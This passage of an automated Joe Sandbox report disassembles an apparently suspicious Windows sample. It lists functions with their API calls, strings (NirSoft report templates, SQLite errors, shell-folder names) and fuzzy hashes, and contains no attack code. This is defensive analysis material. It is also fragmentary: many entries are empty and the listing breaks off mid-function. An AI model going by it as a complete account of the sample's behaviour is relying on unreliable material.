                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                            • String ID: 4$h
                                                            • API String ID: 4066021378-1856150674
                                                            • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                            • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                            Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf
                                                            • String ID: %%0.%df
                                                            • API String ID: 3473751417-763548558
                                                            • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                            • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                            Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                            • GetParent.USER32(?), ref: 00406136
                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                            • String ID: A
                                                            • API String ID: 2892645895-3554254475
                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                            Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                            • memset.MSVCRT ref: 0040DA23
                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                            • String ID: caption
                                                            • API String ID: 973020956-4135340389
                                                            • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                            • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                            Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf$wcscpy
                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                            • API String ID: 1283228442-2366825230
                                                            • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                            • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                            Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcschr.MSVCRT ref: 00413972
                                                            • wcscpy.MSVCRT ref: 00413982
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                            • wcscpy.MSVCRT ref: 004139D1
                                                            • wcscat.MSVCRT ref: 004139DC
                                                            • memset.MSVCRT ref: 004139B8
                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                            • memset.MSVCRT ref: 00413A00
                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                            • wcscat.MSVCRT ref: 00413A27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                            • String ID: \systemroot
                                                            • API String ID: 4173585201-1821301763
                                                            • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                            • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                            Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy
                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                            • API String ID: 1284135714-318151290
                                                            • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                            • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                            Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                            • String ID: 0$6
                                                            • API String ID: 4066108131-3849865405
                                                            • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                            • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                            Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004082EF
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • memset.MSVCRT ref: 00408362
                                                            • memset.MSVCRT ref: 00408377
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 290601579-0
                                                            • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                            • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                            Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memchr.MSVCRT ref: 00444EBF
                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                            • memset.MSVCRT ref: 0044505E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memchrmemset
                                                            • String ID: PD$PD
                                                            • API String ID: 1581201632-2312785699
                                                            • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                            • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                            Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                            • GetParent.USER32(?), ref: 00409FA5
                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                            • String ID:
                                                            • API String ID: 2163313125-0
                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                            Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$wcslen
                                                            • String ID:
                                                            • API String ID: 3592753638-3916222277
                                                            • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                            • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                            Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040A47B
                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                            • String ID: %s (%s)$YV@
                                                            • API String ID: 3979103747-598926743
                                                            • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                            • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                            Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                            • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                            • API String ID: 2780580303-317687271
                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                            Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                            • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                            • String ID: Unknown Error$netmsg.dll
                                                            • API String ID: 2767993716-572158859
                                                            • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                            • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                            Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                            • API String ID: 3176057301-2039793938
                                                            • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                            • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                            Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • database %s is already in use, xrefs: 0042F6C5
                                                            • unable to open database: %s, xrefs: 0042F84E
                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                            • database is already attached, xrefs: 0042F721
                                                            • out of memory, xrefs: 0042F865
                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                            • API String ID: 1297977491-2001300268
                                                            • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                            • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                            Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            APIs
